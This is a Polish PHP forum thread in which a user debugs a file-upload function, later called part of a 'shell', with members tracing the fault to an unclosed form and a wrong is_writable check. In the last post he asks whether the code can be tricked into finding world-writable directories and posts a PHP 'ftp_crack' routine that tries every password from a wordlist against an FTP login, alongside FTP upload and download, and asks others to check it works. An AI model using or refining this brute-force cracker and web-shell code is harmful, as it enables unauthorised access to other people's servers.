Pomoc - Szukaj - U¿ytkownicy - Kalendarz
Pe³na wersja: [PHP]Dziwny upload
Forum PHP.pl > Forum > Przedszkole
marcio
Witam mam nadzieje ze ktos pomoze bo jest to przed ostatnia rzecz zeby skonczyc moj projekt.
Problem polega na tym ze mam upload ktory nie dziala sad.gif na localhost jest blad "Blad podczas upload'u" jednak na innym servie jest blad "Katalog /asd/wer/ nie ma uprawnien" i do tad jest wszystko dobrze bo u mnie dany katalog ma chmod 777 jednak nie wiem dlaczego jest tamten blad oto KOD;
  1. <?php
  2. function upload() {
  3.  
  4. echo('<form method="post" enctype="multipart/form-data" action="'.$_SERVER['PHP_SELF'].'">
  5. <table align="center" width="75%" style="border: 1px dotted white;">
  6. <tr><td align="center"><b>Upload</b></td></tr>
  7. <tr><td align="center">
  8. <input type="hidden" name="MAX_FILE_SIZE" value="999999999">
  9. Dodaj plik: <input type="file" name="up_file" style="font-style:italic; background-color:#000000; color:#00A54E;"> <input type="submit" name="dodaj" value="Dodaj" style="font-style:italic; background-color:#000000; color:#00A54E;">
  10. </td></tr>
  11. ');
  12.  
  13. if(isset($_POST['dodaj'])) {
  14.  
  15. $uploaded_file = $_FILES['up_file']['tmp_name'];
  16. $dir_r = getcwd();
  17.  
  18. if(substr($dir_r, -1, 1) != '/') $dir_r .= '/';
  19. $dir = $dir_r.$_FILES['up_file']['name'];
  20.  
  21.  
  22. if(is_writable($dir)) { 
  23.  
  24.  if(is_uploaded_file($uploaded_file)) {
  25.  
  26. if(move_uploaded_file($uploaded_file, $dir))
  27.  
  28.  echo('<tr><td align="center"><b style="color:#f00">Uploadowano '.$_FILES['up_file']['name'].' do katalogu '.$dir_r.'</b></td><tr></table></form><br>');
  29.  }
  30.  
  31. else echo('<tr><td align="center"><b style="color:#f00">Blad podczas upload'u</b></td></tr></table></form><br>');
  32.  
  33.  }
  34.  
  35. else echo('<tr><td align="center"><b style="color:#f00">Katalog '.$dir_r.' nie ma uprawnien</b></td></tr></table></form><br>');
  36.  
  37.  }
  38. }
  39. ?>

Jednak nic chcialbym zebyscie chociaz dali wskazowke nie mowie ze mi macie kod poprawiac

P.S czy nie idzie tego jakos "oszukac" zeby znajdywal w systemie katalog z prawami rwx bo nikt nie ma praw 777 na katalogu /var/www/ smile.gif

To jak to bardzo wazne dla mnie a nie wiem juz wkoncu co jest zle smile.gif

Zmienilem troche kod probowalem sobie tez wyswietlac zmienne $_FILES ale sa puste nie wiem dlaczego katalog sie tworzy ma dobry chmod ale nic
  1. <?php
  2. function upload() {
  3.  
  4. echo('<form method="post" enctype="multipart/form-data" action="'.$_SERVER['PHP_SELF'].'">
  9. Dodaj plik: <input type="file" name="up_file" style="font-style:italic; background-color:#000000; color:#00A54E;"> <input type="submit" name="dodaj" value="Dodaj" style="font-style:italic; background-color:#000000; color:#00A54E;">
  10. </td></tr>
  11. ');
  12.  
  14.  
  16. $dir_r = getcwd();
  17.  
  18. if(substr($dir_r, -1, 1) != '/') $dir_r .= '/';
  19.  
  20.  if(!file_exists('/var/www/tmp_upload/')) {
  21. $umask_r = umask(0);
  22.  $dir = mkdir($dir_r.'tmp_upload', 0777);
  23. umask($umask_r);
  24. }
  25.  
  26. $nowy_dir = $dir.$_FILES['up_file']['name'];
  27. echo($_FILES['up_file']['tmp_name'].'-'.$_FILES['up_file']['name']);
  28.  
  29.  
  30. if(is_writable($nowy_dir)) { 
  31.  
  32.  if(is_uploaded_file($uploaded_file)) {
  33.  
  34. if(move_uploaded_file($uploaded_file, $nowy_dir))
  35.  
  36.  echo('<tr><td align="center"><b style="color:#f00">Uploadowano '.$_FILES['up_file']['name'].' do katalogu '.$dir_r.'tmp_upload</b></td><tr></table></form><br>');
  37.  }
  38.  
  39. else echo('<tr><td align="center"><b style="color:#f00">Blad podczas upload'u</b></td></tr></table></form><br>');
  40.  
  41.  }
  42.  
  43. else echo('<tr><td align="center"><b style="color:#f00">Katalog '.$dir_r.'tmp_upload nie ma uprawnien</b></td></tr></table></form><br>');
  44.  
  45.  }
  46. }
  47. ?>

W php.ini upoad jest wloczony oto i on:
Cytat
;;;;;;;;;;;;;;;;
; File Uploads ;
;;;;;;;;;;;;;;;;

; Whether to allow HTTP file uploads.
file_uploads = On

; Temporary directory for HTTP uploaded files (will use system default if not
; specified).
;upload_tmp_dir =

; Maximum allowed size for uploaded files.
upload_max_filesize = 2M

Sam nie wiem dlaczego zmienne sa puste niestety na zadnym forum nie znalazlem podobnego problemu

questionmark.gifquestionmark.gif
nowotny
Czy plik siê fizycznie kopiuje na serwer do katalogu tymczasowego...?
marcio
TZN??Do katalogu /var/tmp/ bo to jest pierwszy raz jak robie upload wiec nie wiem o jaki katalog chodzi smile.gif
misiek08
Do jakiego¶ tmp najprawdopodobniej var/tmp/
nowotny
Heh... no ja te¿ w sumie nie wiem... zawsze mi dzia³a³o wiêc nie docieka³em... smile.gif

Spróbuj ustawiæ sobie w php.ini upload_tmp_dir = na jaki¶ do którego php ma dostêp mo¿e...
marcio
Jak widac w php.ini te miejsce jest puste ale na jaki katalog to dac /var/tmp??

P.S jakie bylo polecenie w linux'ie zeby edytowac php.ini

No i mam:
Cytat
;;;;;;;;;;;;;;;;
; File Uploads ;
;;;;;;;;;;;;;;;;

; Whether to allow HTTP file uploads.
file_uploads = On

; Temporary directory for HTTP uploaded files (will use system default if not
; specified).
upload_tmp_dir = /var/tmp/

; Maximum allowed size for uploaded files.
upload_max_filesize = 2M

Jednak dalej nic sad.gif
nowotny
Tutaj jest du¿o sugestii odno¶nie tego: http://getluky.net/2004/10/04/apachephp-_f...eriously-empty/
Poczytaj, popróbuj... mo¿e co¶ zaskoczy...
marcio
Mam nadzieje ze mnie zrozumia bo moj angielski nie jest za dobry tym bardziej w takich sprawach tongue.gif
http://getluky.net/2004/10/04/apachephp-_f...#comment-253431

P.S moze ktos ma inne propozycje
erix
  1. <?php
  2. $dir = $dir_r.$_FILES['up_file']['name'];
  3.  
  4.  
  5. if(is_writable($dir)) {
  6. ?>

is_writable" title="Zobacz w manualu PHP" target="_manual: Returns TRUE if the filename exists and is writable.

Jako argument podajesz ścieżkę do jeszcze NIE ISTNIEJĄCEGO pliku, więc zawsze zwraca false
nowotny
Cytat(erix @ 3.02.2008, 10:23:40 ) *
is_writable" title="Zobacz w manualu PHP" target="_manual: Returns TRUE if the filename exists and is writable.

Jako argument podajesz ¶cie¿kê do jeszcze NIE ISTNIEJ¡CEGO pliku, wiêc zawsze zwraca false

No dobra, ale to nie rozwi±zuje kwestii pustej tablicy $_FILES... :/

Chyba ¿e marcio sprawdza³ to ju¿ po tym warunku... smile.gif
marcio
A wiec zmienilem kod tzn zrobilem wszystko na zmiennych zeby bylo bardziej przejzyste
  1. <?php
  2. function upload() {
  3.  
  10. </td></tr>
  11. ');
  12.  
  14.  
  16. $dir_r = getcwd();
  17. $tmp_dir = 'tmp_upload/';
  18.  
  19.  
  20. if(substr($dir_r, -1, 1) != '/') $dir_r .= '/';
  21.  
  22.  if(!file_exists($dir_r.$tmp_dir)) {
  23. $umask_r = umask(0);
  24.  $dir = mkdir($dir_r.$tmp_dir, 0777);
  25. umask($umask_r);
  26. }
  27.  
  28. $nowy_dir = $dir_r.$tmp_dir.$_FILES['up_file']['name'];
  29. echo($_FILES['up_file']['tmp_name'].'-'.$_FILES['up_file']['name'].'****'.$nowy_dir.'----'.$tmp_dir);
  30.  
  31.  
  32. //if(is_writable($nowy_dir)) { 
  33.  
  34.  if(is_uploaded_file($uploaded_file)) {
  35.  
  36. if(move_uploaded_file($uploaded_file, $nowy_dir))
  37.  
  38.  echo('<tr><td align="center"><b style="color:#f00">Uploadowano '.$_FILES['up_file']['name'].' do katalogu '.$dir_r.'tmp_upload</b></td><tr></table></form><br>');
  39.  }
  40.  
  41. else echo('<tr><td align="center"><b style="color:#f00">Blad podczas upload'u</b></td></tr></table></form><br>');
  42.  
  43.  }
  44.  
  45. //else echo('<tr><td align="center"><b style="color:#f00">Katalog '.$dir_r.'tmp_upload nie ma uprawnien</b></td></tr></table></form><br>');
  46.  
  47. // }
  48. }
  49. ?>

nawet jak nie zakomentuje tego if z is_writable to jest to samo blad podczac uploadu
To jest wynik tego echo ze wszystkimi zmiennymi:
Cytat
-****/var/www/tmp_upload/----tmp_upload/

Czyli zmienna $tmp_dir jest dobra zmienna $nowy_dir jak widac sciezka jest dobra ale juz $_FILES['up_file']['name'] nie ma czyli dalej sa puste te zmienne sad.gif a najlepisze jest to ze nikt nic nie wiem ale dzieki za dobra wole mam nadzieje ze bedziecie mieli jeszcze jakies pomysly
nowotny
A co ci pokazuje print_r($_FILES);... co¶ ciekawego czy jest puste...?
marcio
Cytat
-****/var/www/tmp_upload/----tmp_upload/Array ( ) Array ( )

Nic ciekawego nie pokazuje sad.gif wszystko puste
nowotny
No to jak masz dostêp to poszukaj w logach serwera... ja ju¿ nie mam wiêcej pomys³ów...
marcio
Dokladnie gdzie bo tego troche jest smile.gif
nowotny
error.log albo access.log Apacha... gdzie to znale¼æ na linuksie siê mnie nie pytaj...
marcio
Ostatnie z access.log
Cytat
127.0.0.1 - - [03/Feb/2008:14:26:26 +0100] "POST /edytor.php HTTP/1.1" 200 11520 "http://localhost/edytor.php" "Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.8.1.11) Gecko/20060601 Firefox/2.0.0.11 (Ubuntu-edgy)"

Ostatnie(10 linijek) z error.log
Cytat
find: /root/.gnome2_private: Permission denied
find: /root/.gconf: Permission denied
find: /root/.gconfd: Permission denied
find: /root/.config: Permission denied
find: /root/.kadu: Permission denied
find: /tmp/ssh-mjVAzE4587: Permission denied
find: /tmp/orbit-marcio: Permission denied
find: /tmp/gconfd-marcio: Permission denied
find: /tmp/keyring-R6TcY7: Permission denied
find: /tmp/virtual-marcio.qzy4i8: Permission denied

Ostatnie(10 linijek) z error.log.1
Cytat
[Sat Feb 02 00:11:06 2008] [notice] caught SIGTERM, shutting down
[Sat Feb 02 12:08:15 2008] [notice] Apache/2.0.55 (Ubuntu) PHP/5.1.6 configured -- resuming normal operations
[Sat Feb 02 12:24:22 2008] [error] [client 127.0.0.1] File does not exist: /var/www/favicon.ico
[Sat Feb 02 12:24:23 2008] [error] [client 127.0.0.1] File does not exist: /var/www/favicon.ico
[Sat Feb 02 12:29:33 2008] [error] [client 127.0.0.1] File does not exist: /var/www/favicon.ico
[Sat Feb 02 12:37:55 2008] [error] [client 127.0.0.1] File does not exist: /var/www/favicon.ico
[Sat Feb 02 12:48:08 2008] [error] [client 127.0.0.1] File does not exist: /var/www/favicon.ico
[Sat Feb 02 13:00:51 2008] [error] [client 127.0.0.1] File does not exist: /var/www/favicon.ico
[Sat Feb 02 13:19:56 2008] [error] [client 127.0.0.1] File does not exist: /var/www/favicon.ico
[Sat Feb 02 13:40:11 2008] [error] [client 127.0.0.1] File does not exist: /var/www/favicon.ico
[Sun Feb 03 00:11:35 2008] [notice] caught SIGTERM, shutting down
[Sun Feb 03 12:41:55 2008] [notice] Apache/2.0.55 (Ubuntu) PHP/5.1.6 configured -- resuming normal operations
[Sun Feb 03 12:47:06 2008] [notice] caught SIGTERM, shutting down

Jakies pomysly bo mi te bledy nic nie mowia nie ma nic o edytor.php(o tym shell'u)
nowotny
Ostatnie linijki nic mi nie daj±... wrzuæ gdzie¶ ca³e logi...
marcio
error.log.1
error.log
Access.log nic ciekawego nie mowi smile.gif

Ok po ustawieniu error_rep. na E_ALL mam takie bledy:
Cytat
Notice: Undefined index: up_file in /var/www/edytor.php on line 320

Notice: Undefined index: up_file in /var/www/edytor.php on line 333

Notice: Undefined index: up_file in /var/www/edytor.php on line 334

Notice: Undefined index: up_file in /var/www/edytor.php on line 334

Moze teraz ktos wie o co chodzi??
nowotny
Cytat(marcio @ 3.02.2008, 21:45:47 ) *
Moze teraz ktos wie o co chodzi??

Tyle to ju¿ wiemy... tablica $_FILES jest pusta wiêc si³± rzeczy nie ma klucza 'up_file'... nic nowego... smile.gif
marcio
HEh.. ciekawe jaka jest przyczyna u jednego forumowicza dziala sad.gif

ok poprawilem wszystko jest ok lecz plik dalej sie nie dodaje katalog ma chmod 777 ale pisze ze nie ma uprawnien a plik sie nie dodaje
  1. <?php
  2. function upload() {
  3.  
  10. </td></tr></form>
  11. ');
  12.  
  14.  
  16. $dir_r = getcwd();
  17. $tmp_dir = 'tmp_upload/';
  18.  
  19.  
  20. if(substr($dir_r, -1, 1) != '/') $dir_r .= '/';
  21.  
  22.  if(!file_exists($dir_r.$tmp_dir)) {
  23. $umask_r = umask(0);
  24.  $dir = mkdir($dir_r.$tmp_dir, 0777);
  25. umask($umask_r);
  26. }
  27.  
  28. $nowy_dir = $dir_r.$tmp_dir.$_FILES['up_file']['name'];
  29. echo($_FILES['up_file']['tmp_name'].'-'.$_FILES['up_file']['name'].'****'.$nowy_dir.'----'.$tmp_dir);
  30.  
  31.  
  32. if(is_writable($nowy_dir)) { 
  33.  
  34.  if(is_uploaded_file($uploaded_file)) {
  35.  
  36. if(move_uploaded_file($uploaded_file, $nowy_dir))
  37.  
  38.  echo('<tr><td align="center"><b style="color:#f00">Uploadowano '.$_FILES['up_file']['name'].' do katalogu '.$dir_r.'tmp_upload</b></td><tr></table><br>');
  39.  }
  40.  
  41. else echo('<tr><td align="center"><b style="color:#f00">Blad podczas upload'u</b></td></tr></table><br>');
  42.  
  43.  }
  44. else echo('<tr><td align="center"><b style="color:#f00">Katalog '.$dir_r.$tmp_dir.' nie ma uprawnien</b></td></tr></table><br>');
  45.  
  46. }
  47. }
  48. ?>

Macie jakis pomysl?
nospor
  1. <?php
  2. if(is_writable($nowy_dir))
  3. ?>

Przeciez $nowy_dir wskazuje nie na katalog a na plik, ktorego defacto nie ma, wiec sie nie dziw ze ci tego warunku nie spelnia.

Cytat
ok poprawilem wszystko jest ok
Oj, mogles napisac przy czyjej pomocy winksmiley.jpg
marcio
Defacto masz racje smile.gif wielkie dzieki teraz juz wszystko dziala jednak NOSPOR prosilbym cie o nie usuwanie tematu bo zostala jeszcze jedna rzecz do zrobienia ftp_crack jest to latw ale nigdy nic nie wiadomo
Poprawny if
  1. <?php
  2. if(is_writable($dir_r.$tmp_dir)) {
  3. ?>

P.S oczywiscie Nospor mi powiedzial co mialem poprawic i mial racje + dla ciebie
nospor
Cytat
jednak NOSPOR prosilbym cie o nie usuwanie tematu
A czemu niby mialbym usuwac? (pytanie retoryczne, prosze nie odpowiadac)

Cytat
P.S oczywiscie Nospor mi powiedzial co mialem poprawic i mial racje
Wypadaloby powiedziec co bylo nie tak, by wszyscy ci co tu sie glowili doznali tez tej prawdy winksmiley.jpg

A wiec skoro $_FILES byla pusta, znaczy ze wogole form nie wysylal pliku. Czemu? Przeciez odpowiedni wpis w <form ... byl. Skoro byl w tym form, mozna bylo sie domyslec ze moze nie jest w innym, ktory byc moze jest wyzej. No ale co ma do tego forma inny form ktory jest wyzej? Ano duzo, wprzypadku gdy sie go nie domknie. A skoro marcio nie domykal tego forma do plikow, to mozna bylo z duzym prawdopodobienstwem stwierdzic, ze innych formow tez nie ma w zwyczaju domykac, przez co wchlaniaj± w siebie pozostale formy pod sob± przez co wlasciwosci formow wchlaniach s± olewane. proste winksmiley.jpg
marcio
Nom juz powiedziales co bylo zle smile.gif jednak formy domykalem ale tylko w warunkach myslalem ze to w niczym nie przeszkadza jednak sie mylilem

Mam pytanko wiem ze tak troche glupio wyszlo ale nie mam jak tego przetestowac bo nie moge zalozyc nigdzie serva ftp mam taki kod:
  1. <?php
  2. function ftp() {
  3.  
  4. global $katalog;
  5.  
  6. echo('<form method="post" action="'.$_SERVER['PHP_SELF'].'">
  7. <table align="center" width="75%" style="border: 1px dotted white;">
  8. <tr><td align="center"><b>FTP</b></td></tr>
  9. <tr><td align="center"><input type="text" name="serv" value="SERVER" style="font-style:italic; background-color:#000000; color:#00A54E; border-color: #000000; border: #000000;">
  10. </td></tr>
  11. <tr><td align="center"><input type="text" name="login" value="LOGIN" style="font-style:italic; background-color:#000000; color:#00A54E; border-color: #000000; border: #000000;">
  12. </td></tr>
  13. <tr><td align="center"><input type="text" name="pass" value="HASLO" style="font-style:italic; background-color:#000000; color:#00A54E; border-color: #000000; border: #000000;">
  14. </td></tr>
  15. <tr><td align="center"><input type="text" name="jaki_plik" value="'.$_POST['katalog'].'" style="font-style:italic; background-color:#000000; color:#00A54E; border-color: #000000; border: #000000;">
  16. </td></tr>
  17. <tr><td align="center"><input type="text" name="zap_jako" value="Zapisz jako/Pobierz plik" style="font-style:italic; background-color:#000000; color:#00A54E; border-color: #000000; border: #000000;">
  18. </td></tr>
  19. <tr><td align="center"><input type="text" name="hasla_txt" value="Plik z haslami(txt)" style="font-style:italic; background-color:#000000; color:#00A54E; border-color: #000000; border: #000000;">
  20. </td></tr>
  21. <tr><td align="center"><input type="submit" name="download" value="download" style="font-style:italic; background-color:#000000; color:#00A54E;"> <input type="submit" name="upload" value="upload" style="font-style:italic; background-color:#000000; color:#00A54E;"> <input type="submit" name="crack" value="ftp_crack" style="font-style:italic; background-color:#000000; color:#00A54E;">
  22. </td></tr></form>
  23. ');
  24.  
  25.  
  26. if(!empty($_POST['serv']) && !empty($_POST['login']) && !empty($_POST['hasla_txt']) && isset($_POST['crack'])) {
  27.  
  28. $fp = fopen($_POST['hasla_txt'], 'r');
  29.  
  30. while(!feof($fp))
  31.  $hasla_r = fgets($fp, 4096);
  32. $hasla = explode('\n', $hasla_r);
  33.  
  34.  foreach($hasla as $password) {
  35.  
  36. if($polaczenie = @ftp_connect($_POST['serv'])) {
  37.  
  38.  if($logowanie = ftp_login($polaczenie, $_POST['login'], $password)) {
  39.  
  40. echo('<tr><td align="center"><b style="color:#f00">Haslo znalezione<Br>Server: '.$_POST['serv'].' Login: '.$_POST['login'].' Pass: '.$password.'</b></td><tr></table>');
  41. }
  42. else echo('<tr><td align="center"><b style="color:#f00">Nie znaleziono odpowiedniego hasla</b></td><tr></table></form>');
  43.  }
  44. else echo('<tr><td align="center"><b style="color:#f00">Nie mozna polaczyc z serverem: '.$_POST['serv'].'</b></td><tr></table></form>');
  45. }
  46. }
  47.  
  48.  
  49. if(!empty($_POST['serv']) && !empty($_POST['login']) && !empty($_POST['pass']) && !empty($_POST['jaki_plik']) && !empty($_POST['zap_jako']) && isset($_POST['download'])) {
  50.  
  51. if($polaczenie = @ftp_connect($_POST['serv'])) {
  52.  
  53. if($logowanie = ftp_login($polaczenie, $_POST['login'], $_POST['pass'])) {
  54.  
  55.  $lokalny = fopen($_POST['jaki_plik'], 'w');
  56.  
  57. if($pobranie = ftp_fget($polaczenie, $lokalny, $_POST['zap_jako'], FTP_BINARY)) {
  58. echo('<script>alert("Plik pobrano pomyslnie");</script>');
  59.  ftp_quit($polaczenie);
  60. fclose($lokalny);
  61.  }
  62. }
  63. else echo('<tr><td align="center"><b style="color:#f00">Nie mozna pobrac pliku podano zle dane lub plik nie istnieje</b></td><tr></table></form>'); 
  64. } 
  65. else echo('<tr><td align="center"><b style="color:#f00">Nie mozna nawiazac polaczenia z serverem '.$_POST['serv'].'</b></td></tr></table></form>'); 
  66. }
  67.  
  68.  
  69. if(!empty($_POST['serv']) && !empty($_POST['login']) && !empty($_POST['pass']) && !empty($_POST['jaki_plik']) && !empty($_POST['zap_jako']) && isset($_POST['upload'])) {
  70.  
  71. if($polaczenie = @ftp_connect($_POST['serv'])) {
  72.  
  73. if($logowanie = ftp_login($polaczenie, $_POST['login'], $_POST['pass'])) {
  74.  
  75.  if($przeslanie = ftp_fput($polaczenie, $_POST['zap_jako'], $_POST['jaki_plik'], FTP_BINARY)) {
  76. ftp_quit($polaczenie);
  77. echo('<script>alert("Plik wyslano pomyslnie");</script>');
  78. }
  79. }  
  80. else echo('<tr><td align="center"><b style="color:#f00">Nie mozna wyslac pliku podano zle dane lub plik nie istnieje</b></td></tr></table></form><br>'); 
  81. }
  82. else echo('<tr><td align="center"><b style="color:#f00">Nie mozna nawiazac polaczenie z serverem '.$_POST['serv'].'</b></td></tr></table></form><br>'); 
  83. }
  84. }
  85. ?>

Moze ktos zobaczyc czy wszystko dziala bylbym bardzo wdzieczny??
To jest wersja lo-fi g³ównej zawarto¶ci. Aby zobaczyæ pe³n± wersjê z wiêksz± zawarto¶ci±, obrazkami i formatowaniem proszê kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.